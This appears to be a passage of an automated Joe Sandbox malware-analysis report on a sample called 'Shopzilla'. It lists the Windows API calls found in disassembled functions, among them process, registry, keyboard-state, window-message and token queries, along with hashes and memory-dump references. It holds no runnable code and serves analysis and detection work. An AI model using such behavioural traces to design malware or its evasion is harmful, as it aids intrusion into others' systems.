                                              • Opcode ID: 5b65744c47becfac51b71c65d00639cf0ec0e528ad2199bd3d4c9e81df70cd28
                                              • Instruction ID: f08287f46569558f3bd070909f87dc3150ecc65e9d984e5b3c7cbd2526ed63e8
                                              • Opcode Fuzzy Hash: 5b65744c47becfac51b71c65d00639cf0ec0e528ad2199bd3d4c9e81df70cd28
                                              • Instruction Fuzzy Hash: 0511A174910108CFCF04EFA4C851AFEB7B4FF65304B9085A8ED6597292EB329D5ACB40
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C1F0B8
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C1F0E8
                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C1F21B
                                              • CloseHandle.KERNEL32(?), ref: 00C1F29C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                              • String ID:
                                              • API String ID: 2364364464-0
                                              • Opcode ID: 535ed1050c421d344a7139bbc205d31cfc86d6b6039c07ae6b719166cfddb79d
                                              • Instruction ID: 6d4410ea3c4d19cb8a4c68f0d742cb3b58810c647c195da5fd3a18be40f739f3
                                              • Opcode Fuzzy Hash: 535ed1050c421d344a7139bbc205d31cfc86d6b6039c07ae6b719166cfddb79d
                                              • Instruction Fuzzy Hash: 6B81B0716143009FD720EF28D882F6AB7E5AF89710F14886DF999DB392D7B0AD418B91
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00C21242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C201D5,?,?), ref: 00C21259
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C20525
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C20564
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C205AB
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00C205D7
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00C205E4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: 368fd90eedfd105f6e7cf4481dbb639030f252f6e950ad9afae54f414a62fc57
                                              • Instruction ID: e3a0ef889e5dc87bc0514a9fdd64a0375c1d3e7db907344fe032b1131548f3da
                                              • Opcode Fuzzy Hash: 368fd90eedfd105f6e7cf4481dbb639030f252f6e950ad9afae54f414a62fc57
                                              • Instruction Fuzzy Hash: E2515871218204AFC714EF68D891F6EB7E8FF84304F50896EF59687292DB70E904CB52
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C0EACF
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C0EAF8
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C0EB37
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C0EB5C
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C0EB64
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                              • String ID:
                                              • API String ID: 1389676194-0
                                              • Opcode ID: b3241c99f3c679232e8ddaf0c6b75d4c74bc90914e00e1fe68a05f539adb7fb4
                                              • Instruction ID: c26944e702dd36cd6b86154c9c8ec6a67795e4b4552731b6aecdd0de7aa3c676
                                              • Opcode Fuzzy Hash: b3241c99f3c679232e8ddaf0c6b75d4c74bc90914e00e1fe68a05f539adb7fb4
                                              • Instruction Fuzzy Hash: FC514E35A04505DFCB11EF64C981EAEBBF5EF49310B1484A9E849AB361CB31ED51DF60
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 35602fc15a8a3167b8f1b799d93f33340d0d67db22298c103209125c72ade870
                                              • Instruction ID: 546ada9fe12bdad431d1a6c32661e8c6a3ad72efb74df4cbcc4691a8b56ddc73
                                              • Opcode Fuzzy Hash: 35602fc15a8a3167b8f1b799d93f33340d0d67db22298c103209125c72ade870
                                              • Instruction Fuzzy Hash: AA41D736904624AFC724DF28EC48FAABBB5FB09310F141165F825E76D1D7B09E40DB91
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00BA2727
                                              • ScreenToClient.USER32(00C667B0,?), ref: 00BA2744
                                              • GetAsyncKeyState.USER32(00000001), ref: 00BA2769
                                              • GetAsyncKeyState.USER32(00000002), ref: 00BA2777
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: 3ae8f9ad000c2210108e18e14213c73ae1a3eae562154898d97e5c62e3da3a3f
                                              • Instruction ID: cbee1b5915be0beaa161eff6cb45b08ea47000b553e4de6c6ea9524ac431e642
                                              • Opcode Fuzzy Hash: 3ae8f9ad000c2210108e18e14213c73ae1a3eae562154898d97e5c62e3da3a3f
                                              • Instruction Fuzzy Hash: 0F413275508116FFDF159FA8C884AE9FBB4FB06320F20439AF82996290D730AE50DF91
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00BF93CB
                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00BF9475
                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00BF947D
                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00BF948B
                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00BF9493
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: de270379ff47050bad2fdef24d000305d2e02e6191b7844d3cbc3c75525fcdef
                                              • Instruction ID: a9c22b3f00f6859bddda6a88cbcf031fd6d1412599c1ca4aebc8c445d6d4083e
                                              • Opcode Fuzzy Hash: de270379ff47050bad2fdef24d000305d2e02e6191b7844d3cbc3c75525fcdef
                                              • Instruction Fuzzy Hash: A231DF7250021DEBDB14CFA8D949BAE3BB5EB44315F104259FA24E72D0C3B09918DB91
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00BFBB80
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BFBB9D
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BFBBD5
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BFBBFB
                                              • _wcsstr.LIBCMT ref: 00BFBC05
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                              • String ID:
                                              • API String ID: 3902887630-0
                                              • Opcode ID: 59e00a2855f39562b0f743f8af2c0dd5713a372148cee36051f63810de9da731
                                              • Instruction ID: 7de05ba4c3cdcd449687a18a60523cdb8fc7233fed38008879dac4bb265d88a4
                                              • Opcode Fuzzy Hash: 59e00a2855f39562b0f743f8af2c0dd5713a372148cee36051f63810de9da731
                                              • Instruction Fuzzy Hash: B621D432208208BBEB256B29DC5AF7F7BE8DF45760F1081ADF905CB191EF61DC5192A0
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00C2B57F
                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C2B5A4
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C2B5BC
                                              • GetSystemMetrics.USER32(00000004), ref: 00C2B5E5
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C11340,00000000), ref: 00C2B603
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$Long$MetricsSystem
                                              • String ID:
                                              • API String ID: 2294984445-0
                                              • Opcode ID: e73bf2a65d2df1086dabdf4a15d293a0a8d81ab590ea01c87b02f8e87a2956b6
                                              • Instruction ID: 348995902c4e3d39bf4aadea60c86554f00a5a46ebd6bf382c5ffabaccb8905d
                                              • Opcode Fuzzy Hash: e73bf2a65d2df1086dabdf4a15d293a0a8d81ab590ea01c87b02f8e87a2956b6
                                              • Instruction Fuzzy Hash: FA218371910226AFCB249F3AAC04B6A7BA5FB05721F254739F932D75E0D7309E10CB80
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BF9CBB
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BF9CED
                                              • __itow.LIBCMT ref: 00BF9D05
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BF9D2D
                                              • __itow.LIBCMT ref: 00BF9D3E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow$_memmove
                                              • String ID:
                                              • API String ID: 2983881199-0
                                              • Opcode ID: 0e252b133dd5f3dd807797449d376244d8131fc3274822b9b08ecd58f52f0935
                                              • Instruction ID: c8a65c640f9f39fdbc937ecda5bc8dbb985e7d02afba1d4f9f50dd6322844152
                                              • Opcode Fuzzy Hash: 0e252b133dd5f3dd807797449d376244d8131fc3274822b9b08ecd58f52f0935
                                              • Instruction Fuzzy Hash: DB219535700208BFDB21AA649C9AFFE7BECEB45750F2450B5FE00DB241DA7089499791
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA1729
                                              • SelectObject.GDI32(?,00000000), ref: 00BA1738
                                              • BeginPath.GDI32(?), ref: 00BA174F
                                              • SelectObject.GDI32(?,00000000), ref: 00BA1778
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: abd81f179c421f534bed69ef173813a3074d62a9499af7e718949bd1e94a8675
                                              • Instruction ID: 94c62441e9c2dace9591dc04fb90b733f842b83a3189dac8d91d9d36f0254583
                                              • Opcode Fuzzy Hash: abd81f179c421f534bed69ef173813a3074d62a9499af7e718949bd1e94a8675
                                              • Instruction Fuzzy Hash: CF217CB1904208EFDB219F3ADD44B6DBBF9FB05321F244656F811971E0D7B19891CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 7ab24c1f5daa7afd384008e60d978def5f904d58ccca6f5de5f8e9e9e30c5fe7
                                              • Instruction ID: 32d5de969f0ee569b5b448e57fe39433d0adf5eb8406953efd36e82767f4f7e2
                                              • Opcode Fuzzy Hash: 7ab24c1f5daa7afd384008e60d978def5f904d58ccca6f5de5f8e9e9e30c5fe7
                                              • Instruction Fuzzy Hash: 9401F96161410D7BD204A5555E82F777BCCEE61384F0054E6FE05E7242E611DE68C1A4
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00C04EE2
                                              • __beginthreadex.LIBCMT ref: 00C04F00
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00C04F15
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C04F2B
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C04F32
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                              • String ID:
                                              • API String ID: 3824534824-0
                                              • Opcode ID: d6b31174ffb9b4b353cda4985ff8bf3bdc0c211efa871b7af16b966ef80f642f
                                              • Instruction ID: 58b2678065e045d4a54bba33b1143f62f4ca24188f5ebc9dc5c2c3d1bebbd7ec
                                              • Opcode Fuzzy Hash: d6b31174ffb9b4b353cda4985ff8bf3bdc0c211efa871b7af16b966ef80f642f
                                              • Instruction Fuzzy Hash: 841104B690420ABBC7119BA99C04B9F7BACEB45324F144269F924D32A0D6B58A00C7A0
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BF8C1F
                                              • GetLastError.KERNEL32(?,00BF86E3,?,?,?), ref: 00BF8C29
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00BF86E3,?,?,?), ref: 00BF8C38
                                              • HeapAlloc.KERNEL32(00000000,?,00BF86E3,?,?,?), ref: 00BF8C3F
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BF8C56
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 842720411-0
                                              • Opcode ID: b1efa41b58441ca56593eebd34d49f224045d7f020ecfa5ab28c56a95166a8dc
                                              • Instruction ID: 4702419012e10d5cf7c191bd7d6f0c9e7e87a75342d19f0d83892a2682c32669
                                              • Opcode Fuzzy Hash: b1efa41b58441ca56593eebd34d49f224045d7f020ecfa5ab28c56a95166a8dc
                                              • Instruction Fuzzy Hash: F0016D71611208BFDB204FA6EC98EAF7FACEF89755B200469F948C3220DA318D14CA70
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C05688
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C05696
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C0569E
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C056A8
                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C056E4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 71ccccb38aba5fdd750cfd103705a4f5153bae75770356189fb1da2a891889d1
                                              • Instruction ID: 3b5606c8c6d95d2d7db6395fdcad8486679281247f5e190f36a03e81d7d9862c
                                              • Opcode Fuzzy Hash: 71ccccb38aba5fdd750cfd103705a4f5153bae75770356189fb1da2a891889d1
                                              • Instruction Fuzzy Hash: 29012D31E01A1DDBCF00AFE4D858BEEBBB8FB18711F510456E501B2290CB319550CBA1
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BF7A45,80070057,?,?,?,00BF7E56), ref: 00BF7B28
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BF7A45,80070057,?,?), ref: 00BF7B43
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BF7A45,80070057,?,?), ref: 00BF7B51
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BF7A45,80070057,?), ref: 00BF7B61
                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BF7A45,80070057,?,?), ref: 00BF7B6D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: d79268b5098ee6689908249be1b7f29a2ddd461fafaf66b91c4da4881611e4c5
                                              • Instruction ID: 9ebe6c8aa6e963576050ac4c9ae1ad3a7e85b172ffcb417f1d7327549288a352
                                              • Opcode Fuzzy Hash: d79268b5098ee6689908249be1b7f29a2ddd461fafaf66b91c4da4881611e4c5
                                              • Instruction Fuzzy Hash: 0E015A76615209BBDB114F64ED58BAE7BEDEF45752F2040A8FA08D3211EB31DD04CAA0
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BF8AC1
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BF8ACB
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BF8ADA
                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BF8AE1
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BF8AF7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 90733a4f27f37ee89cf81655d48710f343037da923c58d69d0998360cbc3b98c
